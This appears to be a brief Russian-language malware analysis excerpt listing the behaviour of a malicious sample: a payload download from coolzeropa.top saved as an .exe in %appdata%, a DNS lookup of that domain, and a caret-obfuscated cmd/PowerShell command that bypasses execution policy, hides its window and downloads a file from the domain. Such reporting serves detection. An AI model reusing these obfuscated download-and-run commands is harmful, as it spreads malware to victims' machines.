Техническая информация
- http://coolzeropa.top/admin.php?f=0.dat как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "poWerSH^ELL.ex^e^ ^-^EX^ecuti^O^n^pOLic^Y ^BYpaS^s -no^pROFILe ^-W^InDowsTYle Hid^d^en^ ^(new^-^o^BJECT SYstE^m.^NEt^.We^b^cLI^eNT).doWNL^oa^D^fI^le('http://coolzeropa.top/admi...
- DNS ASK co###eropa.top
- '<SYSTEM32>\cmd.exe' /c "poWerSH^ELL.ex^e^ ^-^EX^ecuti^O^n^pOLic^Y ^BYpaS^s -no^pROFILe ^-W^InDowsTYle Hid^d^en^ ^(new^-^o^BJECT SYstE^m.^NEt^.We^b^cLI^eNT).doWNL^oa^D^fI^le('http://coolzeropa.top/admi...' (со скрытым окном)